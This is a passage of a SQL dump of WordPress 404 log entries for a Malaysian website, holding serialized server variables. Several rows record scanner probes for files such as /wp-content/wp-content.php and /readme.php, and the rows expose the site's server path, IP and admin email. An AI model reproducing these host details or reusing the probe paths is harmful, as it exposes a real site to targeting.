Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"15-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:4:\"15-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/readme.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZpuGE1o81Ms4j7YQaMWlgAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/readme.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZpuGE1o81Ms4j7YQaMWlgAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"94.73.148.70\";s:11:\"REMOTE_PORT\";s:5:\"23040\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:10:\"SCRIPT_URL\";s:11:\"/readme.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZpuGE1o81Ms4j7YQaMWlgAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570401816.3837\";s:12:\"REQUEST_TIME\";s:10:\"1570401816\";}}','notice','2019-10-06 22:43:38','2019-10-06 22:43:36',35053760,36861816,'https://bintara.com.my/readme.php',1,0,'94.73.148.70'),(27599,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:68:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/readme.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"204-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"204-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"204-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/readme.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZpuLMAZj7RBQ-icbk@0dwAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/readme.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZpuLMAZj7RBQ-icbk@0dwAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"94.73.148.70\";s:11:\"REMOTE_PORT\";s:5:\"24330\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/readme.php\";s:10:\"SCRIPT_URL\";s:11:\"/readme.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XZpuLMAZj7RBQ-icbk@0dwAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570401836.7745\";s:12:\"REQUEST_TIME\";s:10:\"1570401836\";}}','notice','2019-10-06 22:43:58','2019-10-06 22:43:57',35049928,36859960,'https://bintara.com.my/readme.php',1,0,'94.73.148.70'),(27530,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3423.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"50199\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZhIQd1PPkMmhEBmc5BcpgAAAYc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570261058.0647\";s:12:\"REQUEST_TIME\";s:10:\"1570261058\";}}','notice','2019-10-05 07:37:40','2019-10-05 07:37:38',35028056,36830728,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(27531,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/2018/?xxxxxxxxxxxx_loads=true\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/533.36 (KHTML, like Gecko) Chrome/46.0.2754.75 Safari/533.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/2018/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/2018/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZhORHo-OcnxNShAA4UqEgAAAU0\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/2018/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/2018/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZhORHo-OcnxNShAA4UqEgAAAU0\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"51.255.43.81\";s:11:\"REMOTE_PORT\";s:5:\"42211\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/2018/\";s:10:\"SCRIPT_URL\";s:6:\"/2018/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZhORHo-OcnxNShAA4UqEgAAAU0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570262596.9095\";s:12:\"REQUEST_TIME\";s:10:\"1570262596\";}}','notice','2019-10-05 08:03:19','2019-10-05 08:03:17',35037592,36839904,'https://bintara.com.my/2018/?xxxxxxxxxxxx_loads=true',1,0,'51.255.43.81'),(27456,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_CACHE_CONTROL\";s:9:\"max-age=0\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\";s:8:\"HTTP_VIA\";s:30:\"1.0 scaleway001 (squid/3.5.20)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"45.76.27.98\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.190.160\";s:11:\"REMOTE_PORT\";s:5:\"16504\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZV2iMZsWtvRB7UEo4-I@QAAAAY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570076296.8388\";s:12:\"REQUEST_TIME\";s:10:\"1570076296\";}}','notice','2019-10-03 04:18:20','2019-10-03 04:18:17',35543648,37357688,'https://bintara.com.my/?page_id=18',1,0,'45.76.27.98'),(27450,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:54:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/wp-content/wp-content.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/wp-content/wp-content.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/wp-content/wp-content.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZUzzfPAUZ@EikAaJdWvAAAAAdA\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/wp-content/wp-content.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/wp-content/wp-content.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZUzzfPAUZ@EikAaJdWvAAAAAdA\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/wp-content/wp-content.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/wp-content/wp-content.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZUzzfPAUZ@EikAaJdWvAAAAAdA\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"69.163.163.120\";s:11:\"REMOTE_PORT\";s:5:\"55326\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"https://bintara.com.my/wp-content/wp-content.php\";s:10:\"SCRIPT_URL\";s:26:\"/wp-content/wp-content.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZUzzfPAUZ@EikAaJdWvAAAAAdA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570059214.0164\";s:12:\"REQUEST_TIME\";s:10:\"1570059214\";}}','notice','2019-10-02 23:33:36','2019-10-02 23:33:34',35200288,37003208,'https://bintara.com.my/wp-content/wp-content.php',1,0,'69.163.163.120'),(27446,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"108.161.128.136\";s:11:\"REMOTE_PORT\";s:5:\"56539\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZUFc-PAUZ@EikAaJdWgnQAAAdc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570047347.9304\";s:12:\"REQUEST_TIME\";s:10:\"1570047347\";}}','notice','2019-10-02 20:15:50','2019-10-02 20:15:48',35538416,37344048,'https://bintara.com.my/?page_id=18',1,0,'108.161.128.136'),(27447,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:7:\"/?p=167\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:76:\"text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; SemrushBot/6~bl; +http://www.semrush.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:5:\"p=167\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.229.168.143\";s:11:\"REMOTE_PORT\";s:5:\"62012\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZUIizL-8UHe5oPGfv6AmwAAAE8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570048139.5477\";s:12:\"REQUEST_TIME\";s:10:\"1570048139\";}}','notice','2019-10-02 20:29:02','2019-10-02 